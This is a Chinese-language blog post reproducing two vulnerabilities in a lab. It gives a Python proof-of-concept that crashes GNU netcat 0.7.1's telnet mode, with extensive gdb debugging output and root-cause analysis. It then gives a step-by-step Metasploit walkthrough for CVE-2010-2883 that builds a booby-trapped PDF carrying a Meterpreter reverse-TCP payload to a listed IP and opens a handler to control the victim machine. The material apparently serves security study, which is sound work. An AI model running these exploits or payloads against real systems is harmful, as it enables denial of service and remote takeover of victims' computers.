二进制漏洞复现

发表于 更新于

二进制漏洞复现

NETCAT【NC】 0.7.1 远程拒绝服务漏洞

nc在使用-T参数的时候是负责处理telnet连接,当利用nc构建一个telnet的服务端的时候,如果在客户端发送特殊的数据包,nc会处理telnet数据,会导致nc在处理telnet数据的时候,由于处理buffer的时候在处理结束时没有对buffer的长度进行重置,导致连续多次写入telnet数据之后,由于向不可写的内存写入数据,最后引发拒绝服务漏洞,下面对此漏洞进行详细分析。

软件下载:https://www.exploit-db.com/apps/088def25efe04dcdd1f8369d8926ab34-netcat-0.7.1.tar.gz

poc:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
#/usr/bin/python
#-*- Coding: utf-8 -*-

import socket

RHOST = "127.0.0.1"
RPORT = 1111

print("[+] Connecting to %s:%d") % (RHOST, RPORT)
s = socket.create_connection((RHOST, RPORT))
s.send("\xFF") # Telnet control character
print("[+] Telnet control character sent")
print("[i] Starting")
try:
    i = 0
    while True: # Loop until it crashes
        i += 1
        s.send("\x30")
except:
    print("[+] GNU Netcat crashed on iteration: %d") % (i)

1、用gdb附加进程

1
2
file netcat
run -T -lvvp 1111 #监听本地的1111端口

1568388783381

2、远程执行payload

1568388965825

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
[----------------------------------registers-----------------------------------]
RAX: 0x21ae0 
RBX: 0x0 
RCX: 0x21ae1 
RDX: 0x30 ('0')
RSI: 0x0 
RDI: 0x7fffffffcfd0 --> 0x200000004 
RBP: 0x1 
RSP: 0x7fffffffc550 --> 0x20 (' ')
RIP: 0x405fe4 (<netcat_telnet_parse+100>:	mov    BYTE PTR [rax+0x609520],dl)
R8 : 0x0 
R9 : 0x20 (' ')
R10: 0x0 
R11: 0x246 
R12: 0x7fffffffcfd0 --> 0x200000004 
R13: 0x7fffffffc710 ('0' <repeats 1024 times>, "\260\323\377\377\377\177")
R14: 0x1 
R15: 0x1
EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x405fd7 <netcat_telnet_parse+87>:	je     0x406080 <netcat_telnet_parse+256>
   0x405fdd <netcat_telnet_parse+93>:	lea    ecx,[rax+0x1]
   0x405fe0 <netcat_telnet_parse+96>:	lea    r14d,[rsi+0x1]
=> 0x405fe4 <netcat_telnet_parse+100>:	mov    BYTE PTR [rax+0x609520],dl
   0x405fea <netcat_telnet_parse+106>:	cmp    ecx,0x1
   0x405fed <netcat_telnet_parse+109>:	mov    DWORD PTR [rip+0x203531],ecx        # 0x609524 <l.5494>
   0x405ff3 <netcat_telnet_parse+115>:	je     0x4060f8 <netcat_telnet_parse+376>
   0x405ff9 <netcat_telnet_parse+121>:	movzx  eax,BYTE PTR [rip+0x203521]        # 0x609521 <getrq.5493+1>
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffc550 --> 0x20 (' ')
0008| 0x7fffffffc558 --> 0xc59568e1f6f6d600 
0016| 0x7fffffffc560 --> 0x7fffffffcfd0 --> 0x200000004 
0024| 0x7fffffffc568 --> 0x7fffffffd770 --> 0x0 
0032| 0x7fffffffc570 --> 0x7fffffffc710 ('0' <repeats 1024 times>, "\260\323\377\377\377\177")
0040| 0x7fffffffc578 --> 0x4 
0048| 0x7fffffffc580 --> 0x1 
0056| 0x7fffffffc588 --> 0x403e18 (<core_readwrite+1816>:	mov    eax,DWORD PTR [rbx+0x3c0])
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV

通过bt命令来回溯一下堆栈调用

1
2
3
4
5
6
gef➤  bt
#0  netcat_telnet_parse (ncsock=ncsock@entry=0x7fffffffcfd0) at telnet.c:100
#1  0x0000000000403e18 in core_readwrite (nc_main=nc_main@entry=0x7fffffffcfd0, nc_slave=nc_slave@entry=0x7fffffffd770) at core.c:823
#2  0x0000000000402131 in main (argc=argc@entry=0x4, argv=argv@entry=0x7fffffffdc58) at netcat.c:499
#3  0x00007ffff7a2d830 in __libc_start_main (main=0x4019d0 <main>, argc=0x4, argv=0x7fffffffdc58, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffdc48) at ../csu/libc-start.c:291
#4  0x0000000000402889 in _start ()

根据崩溃的位置,0x405fe4 <netcat_telnet_parse+100>: mov BYTE PTR [rax+0x609520],dl

rax为0x21ae0,dl为0x30,我们来看一下0x62b000的位置

1
2
3
4
5
6
7
8
9
10
11
gef➤  x/16x 0x62b000
0x62b000:	Cannot access memory at address 0x62b000
gef➤  x/16x 0x62a000
0x62a000:	0x3030303030303030	0x3030303030303030
0x62a010:	0x3030303030303030	0x3030303030303030
0x62a020:	0x3030303030303030	0x3030303030303030
0x62a030:	0x3030303030303030	0x3030303030303030
0x62a040:	0x3030303030303030	0x3030303030303030
0x62a050:	0x3030303030303030	0x3030303030303030
0x62a060:	0x3030303030303030	0x3030303030303030
0x62a070:	0x3030303030303030	0x3030303030303030

发现上面的位置全部被我们发送的payload覆盖了,当覆盖到0x62b000不可写的时候崩溃,造成远程拒绝服务

3、ida逆向分析

找到netcat_telnet_parse函数的入口位置,下一个断点 b *0x0405F80

1568389533229

接着ni单步运行,一直运行到0x405fe4处下个断点

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
[----------------------------------registers-----------------------------------]
RAX: 0x0 
RBX: 0x0 
RCX: 0x1 
RDX: 0xff 
RSI: 0x0 
RDI: 0x7fffffffcfd0 --> 0x200000004 
RBP: 0x1 
RSP: 0x7fffffffc550 --> 0x20 (' ')
RIP: 0x405fe4 (<netcat_telnet_parse+100>:	mov    BYTE PTR [rax+0x609520],dl)
R8 : 0x0 
R9 : 0x20 (' ')
R10: 0x37b 
R11: 0x246 
R12: 0x7fffffffcfd0 --> 0x200000004 
R13: 0x7fffffffc710 --> 0xff 
R14: 0x1 
R15: 0x1
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x405fd7 <netcat_telnet_parse+87>:	je     0x406080 <netcat_telnet_parse+256>
   0x405fdd <netcat_telnet_parse+93>:	lea    ecx,[rax+0x1]
   0x405fe0 <netcat_telnet_parse+96>:	lea    r14d,[rsi+0x1]
=> 0x405fe4 <netcat_telnet_parse+100>:	mov    BYTE PTR [rax+0x609520],dl
   0x405fea <netcat_telnet_parse+106>:	cmp    ecx,0x1
   0x405fed <netcat_telnet_parse+109>:	mov    DWORD PTR [rip+0x203531],ecx        # 0x609524 <l.5494>
   0x405ff3 <netcat_telnet_parse+115>:	je     0x4060f8 <netcat_telnet_parse+376>
   0x405ff9 <netcat_telnet_parse+121>:	movzx  eax,BYTE PTR [rip+0x203521]        # 0x609521 <getrq.5493+1>
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffc550 --> 0x20 (' ')
0008| 0x7fffffffc558 --> 0x7a3ee16a65764700 
0016| 0x7fffffffc560 --> 0x7fffffffcfd0 --> 0x200000004 
0024| 0x7fffffffc568 --> 0x7fffffffd770 --> 0x0 
0032| 0x7fffffffc570 --> 0x7fffffffc710 --> 0xff 
0040| 0x7fffffffc578 --> 0x4 
0048| 0x7fffffffc580 --> 0x1 
0056| 0x7fffffffc588 --> 0x403e18 (<core_readwrite+1816>:	mov    eax,DWORD PTR [rbx+0x3c0])
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
gef➤  b
Note: breakpoints 2 (disabled) and 3 (disabled) also set at pc 0x405fe4.
Breakpoint 5 at 0x405fe4: file telnet.c, line 100.

然后输入ni就可以将我们的payload输入到0x609520处,查看

1
2
3
4
5
6
7
8
9
gef➤  x/16x 0x609520
0x609520 <getrq.5493>:	0x00000000000000ff	0x0000000000000000
0x609530:	0x0000000000000000	0x0000000000000000
0x609540:	0x0000000000000000	0x0000000000000000
0x609550:	0x0000000000000000	0x0000000000000000
0x609560:	0x0000000000000000	0x0000000000000000
0x609570:	0x0000000000000000	0x0000000000000000
0x609580:	0x0000000000000000	0x0000000000000000
0x609590:	0x0000000000000000	0x0000000000000000

0xff是问poc输入的第一个字符,接着直接c运行到断点

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
[----------------------------------registers-----------------------------------]
RAX: 0x2 
RBX: 0x1 
RCX: 0x3 
RDX: 0x30 ('0')
RSI: 0x1 
RDI: 0x7fffffffcfd0 --> 0x200000004 
RBP: 0x400 
RSP: 0x7fffffffc550 --> 0x20 (' ')
RIP: 0x405fe4 (<netcat_telnet_parse+100>:	mov    BYTE PTR [rax+0x609520],dl)
R8 : 0x0 
R9 : 0x20 (' ')
R10: 0x0 
R11: 0x246 
R12: 0x7fffffffcfd0 --> 0x200000004 
R13: 0x7fffffffc710 ('0' <repeats 1024 times>, "\260\323\377\377\377\177")
R14: 0x2 
R15: 0x1
EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x405fd7 <netcat_telnet_parse+87>:	je     0x406080 <netcat_telnet_parse+256>
   0x405fdd <netcat_telnet_parse+93>:	lea    ecx,[rax+0x1]
   0x405fe0 <netcat_telnet_parse+96>:	lea    r14d,[rsi+0x1]
=> 0x405fe4 <netcat_telnet_parse+100>:	mov    BYTE PTR [rax+0x609520],dl
   0x405fea <netcat_telnet_parse+106>:	cmp    ecx,0x1
   0x405fed <netcat_telnet_parse+109>:	mov    DWORD PTR [rip+0x203531],ecx        # 0x609524 <l.5494>
   0x405ff3 <netcat_telnet_parse+115>:	je     0x4060f8 <netcat_telnet_parse+376>
   0x405ff9 <netcat_telnet_parse+121>:	movzx  eax,BYTE PTR [rip+0x203521]        # 0x609521 <getrq.5493+1>
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffc550 --> 0x20 (' ')
0008| 0x7fffffffc558 --> 0x7a3ee16a65764700 
0016| 0x7fffffffc560 --> 0x7fffffffcfd0 --> 0x200000004 
0024| 0x7fffffffc568 --> 0x7fffffffd770 --> 0x0 
0032| 0x7fffffffc570 --> 0x7fffffffc710 ('0' <repeats 1024 times>, "\260\323\377\377\377\177")
0040| 0x7fffffffc578 --> 0x4 
0048| 0x7fffffffc580 --> 0x1 
0056| 0x7fffffffc588 --> 0x403e18 (<core_readwrite+1816>:	mov    eax,DWORD PTR [rbx+0x3c0])
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
gef➤  x/16x 0x609520
0x609520 <getrq.5493>:	0x00000002000030ff	0x0000000000000000
0x609530:	0x0000000000000000	0x0000000000000000
0x609540:	0x0000000000000000	0x0000000000000000
0x609550:	0x0000000000000000	0x0000000000000000
0x609560:	0x0000000000000000	0x0000000000000000
0x609570:	0x0000000000000000	0x0000000000000000
0x609580:	0x0000000000000000	0x0000000000000000
0x609590:	0x0000000000000000	0x0000000000000000

0x609524的位置保存着rax的位置,即我们输入的次数,然后会将我们输入的覆盖到0x609524+rax的位置,当超过不可写的位置时,就会崩溃。

4、查看反编译的伪c代码

1568390236310

buf,size变量指针都取决于ncsock结构体,而后面赋值时会将buf赋值给getrq_5494,而l_5494就是全局变量

结束处理的时候,没有对全局变量重置,最后导致了拒绝服务的发生

[漏洞复现] CVE-2010-2883 Adobe Reader 打开pdf电脑即刻中招

CVE-2010-2883漏洞原理:“Adobe Reader在处理CoolType字体文件的sing表时,存在栈溢出漏洞,当打开特制的恶意PDF文件时,可允许任意代码远程执行

影响版本:Adobe Reader 8.2.4 - 9.3.4

步骤

1、进入Kali Linux,使用Metasploit生成PDF木马文件

1
2
3
4
5
6
搜索Adobe渗透模块  
msf > search adobe_cooltype_sing 
调用渗透模块  
msf > use exploit/windows/fileformat/adobe_cooltype_sing/ 
查看模块详情  
msf exploit(adobe_cooltype_sing) > info

1565883113002

1
2
3
4
5
6
7
8
9
10
调用meterpreter载荷,反向连接到渗透机  
msf  exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp  
设置Kali Linux的IP地址  
msf  exploit(adobe_cooltype_sing) > set LHOST 139.196.143.238  
设置本地监听端口  
msf  exploit(adobe_cooltype_sing) > set LPORT 8888  
设置带有后门程序的PDF文件  
msf  exploit(adobe_cooltype_sing) > set FILENAME PINGINGLAB.pdf  
执行渗透生成文件  
msf  exploit(adobe_cooltype_sing) > exploit

1565883319089

2、先将PDF木马文件拷贝至 Linux的/root,然后将PDF木马文件拷贝至window靶机桌面

1
cp /root/.msf4/local/PINGINGLAB.pdf /root/PINGINGLAB.pdf

1565883705010

3、Metasploit开启shell监听会话,等待肉鸡上线

1
2
3
4
5
6
7
8
9
10
使用handler监听模块  
msf > use exploit/multi/handler  
回弹一个tcp连接  
msf  exploit(handler) > set payload windows/meterpreter/reverse_tcp  
设置监听IP地址(跟PDF木马文件一致)  
msf  exploit(handler) > set LHOST 139.196.143.238  
设置监听的端口(跟PDF木马文件一致)  
msf  exploit(handler) > set LPORT 8888  
开启监听  
msf  exploit(handler) > exploit

1565884017232

4、win7安装了Adobe Reader 9.3之后用其打开pdf

1565884116994

1565884208232

5、Metasploit获取shell会话,并用Meterpreter控制肉鸡

1565884394171